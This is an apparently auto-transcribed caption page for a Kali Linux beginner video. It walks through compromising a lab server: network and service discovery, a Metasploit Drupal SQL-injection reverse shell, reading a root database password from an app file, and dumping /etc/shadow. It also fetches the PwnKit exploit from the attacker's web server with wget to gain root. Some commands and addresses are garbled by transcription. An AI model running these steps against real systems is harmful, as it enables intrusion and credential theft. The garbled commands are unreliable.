Kali Linux Tutorial For Beginners!

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

so today we'll be learning about colonics and how we can use con linux to run a simple penetration testing or adequate hacking against a target device and that computer could be a mobile device it could be a router it could be a target server either the case we are able to break into it [Music] and there are four items you want to think about when it comes to running an article hacking and penetration testing against a target device and the first part is about discovering all of the devices within the network so you could be joining a say a wi-fi network could be joining an office network whichever the case is about discovery of all the devices within the network the second part is about identifying the services within the device so say for example you have targeted a server and perhaps in that server there is a specific service like say for example a web server so web server is the target that you want to go after because of a mispatch or a vulnerability or misconfiguration within the website itself and once you discover all these different services and their versions you want to find an exploit that is available so that you are able to take advantage of that vulnerability and afterwards using an exploit to gain control of that specific service and finally you want to be able to elevate your privileges so that you're able to do further different types of attacks within this device because you are coming in as a limited user and you may not have all of the power permissions to run different type of changes and modification to the server so with elevated privileges say for example like root you'll be able to do much more and yes kids hacking is illegal if you get caught hacking do not tell them that you know who is hack or lawyer if you want to run any of these hacking activities only do it in your own lab environment or if you've gotten content from a target company and of course don't try to hack hacker logic whatever you're learning today remember smash the like button and turn notification to the channel so that you don't get hacked so right in front of us we're in call linux and call linux is going to be our ethical hacking and penetration testing tool and it's awesome so here you can see from the left side all right there's a menu and in the menu what we can see here are the different type of segment of the software that we can use as part of running a simple penetration testing or even an advanced one so you can see on the left side we have all these different segments so we have one two three four five and so on and so forth and with information gathering as a start so here you can see the following right so it's about identifying all the devices uncovering all the different services in relation to the target device so you have a lot of different tools right here where vulnerability analysis to look out for all these different services that have different types of vulnerabilities within them and with web application analysis to target more specifically on a target website or web server we can look at databases on the backend so that we can break into it and pull up those passwords hashes all this incredibly important critical data and with password attack so password attacks have two forms either a online or offline attack online attack meaning that we are going to try targeting the server live an offline attack is after you've extracted those information from the database and then after which you begin cracking or breaking those passwords wireless attacks where you can then look into using different type of tools to sniff all the different wireless accesses within the vicinity and at the same time you're able to target like a brute force attack against those wifi networks or to be able to set up fake wi-fi's reverse engineering where we'll be looking at how we can look at an application how it runs in memory right exploitation tools is available here as well so you can easily look out for different type of exploits to go after those different type of services sniffing and spoofing all right so this is the part where we are doing say a man-in-the-middle attack so we can capture all the traffic information that is being sent to and fro the target device as well as all the way to the internet post exploitation so what do we do after we have hacked into the device can we elevate our privileges can we dump out the usernames and passwords file forensics where we want to look into the different type of evidences that can occur as a result of a hack reporting tools so ultimately if you're running a penetration testing an article hacking service for your company you want a general report to show all these different vulnerabilities and recommendations that they can take on to protect your devices social engineering tools so you can see all this different type of phishing scam emails and so on and so forth there's creating all this fake different sites and finally kali and offset links that you can check out as part of learning more about cyber security or ethical hacking and penetration testing no worries i know it's a lot of tools out there for us to learn on so i'll be using some of this different type of tools that we can use as part of launching our tactics based on the four key points i've shared with you earlier and the first item you want to familiarize yourself with in kali linux is on the terminal so this is the place where we entering all these different commands parameter options as part of using the different type of tools in launching a cyber attack so the first two we'll look at you can enter net discover h so this what it does for us is to use address resolution protocol to help us uncover all these different devices in the network and the purpose of address resolution protocol is to be able to map the different ip addresses to the mac address which is the physical address so here what the hacker will be doing is that the hacker on the left side will then be using this as a way to communicate to be able to get all the mac addresses as well as all the different ip addresses that's connected over back to the router or in the network then this will help us discover all these different devices within the network the hacker will be able to target the different type of devices now jumping back to call linux all we got to do now is go ahead and enter net discover all right dash r followed by 192.168.0.0.24 so once you enter on this all right we'll be able to run the instruction to discover all the different devices within the network so i hit enter on that and you can see right here we're doing all these different type of up requests you can see all the different ip addresses as well as the mac vendor and host name for it okay and in today's session we'll be targeting 1i2 168.0.183 so next thing we want to do is to use a more precise scan using nmap so you can enter nmap followed by h to see the help document and we can see all the different options that's available for us to target the device more specifically all right so here what we can do now is enter nmap followed by the target ip address of 182 168.0.183 so this is our target device so go ahead and hit enter on that it'll be using all the default options that comes available with nmap as part of a default scan so here you can see we're scanning that specific ip address and once we're done with the scan we'll be able to look at all the different services within that device so right here we're done so we can see all the different services right so we have port 21 we have port 22 8 0 and so on and so forth so in this case we are going to go ahead and target http so this is on port 8 0 and all you got to do is just go ahead and open up any browser and browse over into that target device all right just to see what kind of service is hosted on there so you can enter 192.168.0.183 hit enter on that and right here we can see the following so we have index off and we have multiple directories so we have chat drupal payroll underscore app.php phpmyadmin so go ahead and click onto any of them and see what it brings for you right so here you can see in this case we have drupal so drupal is a content management service and it could be exploitable and at the same time we also have chat okay so you can enter a name to continue we can look at payroll underscore app so there's a login page to this and we don't know what's the username or the password and likewise we have phpmyadmin which gives us the opportunity to control the values within the database to manage the tables and all of that so likewise once again over here we have no idea what exactly is the username nor the password to access any of the services the next thing we want to do is to be able to uncover all the different directories and files within say the content management system of drupal so what you can do is can enter directory buster and then followed by the target so in this case we can say http 192.168.0.1.3 hit enter on that and of course in this case it would have a popup and what we can do now is just go ahead and target on this so here we can enter http alright followed by the target of 192.168.0.183 and what we can do now is to browse okay to a specific place where we can use a wordlist to look up for all these different directories and files so we can go to usr we can go to share we can go over to work list as part of launching the attack against specific websites so in this case we have directory list 1.0 medium small whichever you want to use so let's go ahead and target list2.3 small all right so this are some of the commonly used directory names that we can target against and what we want to do now is to specify the directory so drupal slash all right so we got a target url we got a directory now we got the following list of directories go go ahead and click start and this will begin crawling through the entire site to look up for all these different directories and where they could be running on so this is a really useful way for us to boot faster content management system which has all these commonly used directories so we receive enough information and we also know the structure of content management system so over here what we are targeting is under drupal all right and then under modules and in modules there's one product called blog and within block we've got a couple really interesting information that we can go after so in this case we have drupal modules block and block dot info so all i'm going to do now is do right click open in browser and we can see the following let's go ahead and open up with mousepad so once we open up with mousepad we can see the following information here so when a hacker is targeting a server there are several things they're doing as part of launching the attack first to discover all these different services say for example in this case we are targeting a http server or a service within the server so what we can do then is to uncover all right what are some of the misconfiguration within it are there different misconfiguration vulnerabilities or are there possibly all right any of these mispatches that the application is not installed with which we can take advantage of and sometimes it could just be a simple plugin or library it hasn't been updated for years which is quite common on the internet across the internet and here this is the place where once we find a loophole right the hacker will then be able to take advantage of it and then after we be able to exploit this and giving them access over into the server and we can further verify this by entering cm sig so cmsiq we can target a specific site to know exactly what version it is running on so we'll select number one for cms detection and deep scan and we can target http 192.168.0.183 drupal hit enter on that and you can see the following right here okay we have the information of drupal version 7. all right so we know that this is going to be a place for us to search out specifically for exploit that we can use to target version 7 of drupal so with the discovered information what we can do now is head over to matasploit so we can enter sudo msf console enter your password for it hit enter on that and what we can do now is to search search for specific exploits that we can use is part of targeting that service or the content management system so here what we can do now is to go ahead and enter search followed by drupal hit enter on that and we can see we have several options available here okay so here zero one two three four five six seven so all these are the options available for us and we're looking out for exploits so there are exploit unix webex all right there is exploit web app drupal drupal gaden and and all this so we want to take a look at more information per exploit so to see whether this are going to be applicable for the target service so let's go ahead and enter use number two and what we can do now is to go ahead and enter show info so from the information we can see right here okay we have this module exploits the drupal http parameter key value sql injection in order to achieve a remote shell on the vulnerable instance was tested against drupal 7.0 and 7.31 and was fixed in 7.32 two methods available to trigger and so on and so forth so we have all this different information so with all this information now we can go ahead and target this website to see whether we can break into it so all you have to do is now is enter show options and once you enter show options now all right we have the lhost which is the ip address of the call linux machine and we have l port if you screw up further all right so all we got to do now is input on our host which is the target address and the target uri so you can see right here under all right the following required so yes we need our host and yes we need the target uri so go ahead and enter that so go ahead and enter set our hosts 192 192.168.0.183 all right and then of course we can enter set target uri in this case all right two slash drupal slash okay so once you have that go ahead and enter options to review all the different values that you've entered so we have l host l port we have the target url we have the r host so now in three two one enter exploit and you can see the following startup reverse tcp handler on 192.168.00182.444 and here you can see the following interpreter session one open all right what does it mean it means that we're in it's game over so there you go we got multiple session right here and all i got to do now is enter get uid and we can see here server username w data now let's go in and see how much deeper can we go down the rabbit hole now what i can do is enter shell so that we are now in shell and i can enter pwd to print working directory and what i can want to do now is to see whether we are able to get certain information so here i can enter saferexmo cat etc shadow i hit enter on that oh permission deny so we don't have the permission to be able to run certain commands to pull off certain files directories and information but this means that we still have the power to go in further and see what other attacks can we use right to get more information so one of that is i can see the over into the following so here we are in var www.html drupal and if you go back over into the site over here we can see that there's a payroll underscore app.php so if i go back over here what i want to do now is to enter cd.pwd all right and then we can enter ls and you can see right here under cat payroll underscore app.php i hit enter on this and we have different information that's available here and one of them you can find out from all this different code and information right here we have a really interesting piece of information which is that we have root and split me what does this mean it means that we possibly already have the username as well as the password to some parts of the system and if i jump back over into the site over here you can see the following we have drupal payroll php my admin so if i click under php my admin i enter root and i enter the password exploit me i click go boom we're in the final part of all is about privilege escalation on the linux system so right here you can see the following we're at cv20214034 all right so this is the place that we're going into in order to have a privilege escalation within the system so what i can do now is i can go ahead and download this all right onto a call linux machine so i can jump back over into say a new terminal and what it can do now is to go ahead and enter git clone all right and then we can target over here so this is the length for us to target and all i got to do is paste it over here hit enter on that and it says following cloning the cv 20214034 so we got the information right here and we can do the same as well in the target session that we already have so i can cd into 10 all right and once i am in here i can do the same thing all right so i can enter git clone followed by the link over here git clone github all right riya guard cv2021034 i hit enter on that and it says cloning into cve two zero two one four zero three four so while we're doing the cloning here we may have certain limitations while we are using it as a limited user within the system as a result of that we may have to git clone it over to call linux machine i want to serve it to an application server so that the target device can then download from there so what i'll do now is copy all right cve 202 and 4034 to var www.html all right hit enter on that so now we are going to target and specify on this so let's go ahead and have the dash r for that all right and of course you also likewise ask us for sudo because we were copying files over to var with html so done okay so what we can do now is go ahead and enter system all right so enter pseudosystem ctl followed by start apigee 2 dot service hit enter on that alright so we started our web server so that we are hosting the file now jumping back to metasploit i can enter sessions i followed by the session target so now we are having an interaction with one i can enter shell i can cd over to tmp enter pwd and what we can do now is do a wget dash dash recursive all right followed by dash dash no dash parent followed by http 192.168.0.182 cve-2021-4034 slash hit enter on that so now we are downloading and we have downloaded all of the 15 files right here so what it can do now is enter ls and we can see the following over here i can cd over to cve dash 2021 followed by 4034 hit enter on that okay so once i'm here i can enter ls and of course we can see the following we have make file readme even so dot c exploit dot c all right so what we can do now is just go ahead and enter make and all we got to do now is enter ls and you can see the following an extra file right here i can enter ls-l so we have an extra file right here which is exploit and all i got to do now is enter dot slash exploit oh wait before i do that just to clarify view and enter who am i i am www dash data so i enter dot slash exploit hit enter on that now i enter who am i and we're in we now have complete control of the entire system with root and to confirm on that i can enter cat etc shadow hit enter on that boom we're in the reason why all this are happening is because of mispatches misconfiguration with the setup of different services within the server which results in the exploitation of all these different vulnerabilities so it's critical to update your systems regularly so that when such critical vulnerabilities are discovered within the services you want to quickly update them you want to use this or to scan your own websites looking out for different vulnerabilities exposure and quickly secure them looking out for misconfiguration or missed patches and quickly update them so that you don't get hacked

Info

Channel: Loi Liang Yang

Views: 313,125

Rating: undefined out of 5

Keywords: hacker, hacking, cracker, cracking, kali linux, kali, metasploit, ethical hacking, ethical hacker, penetration testing, penetration tester, owasp

Id: WUMo7LMRdwA

Channel Id: undefined

Length: 17min 58sec (1078 seconds)

Published: Sat Mar 19 2022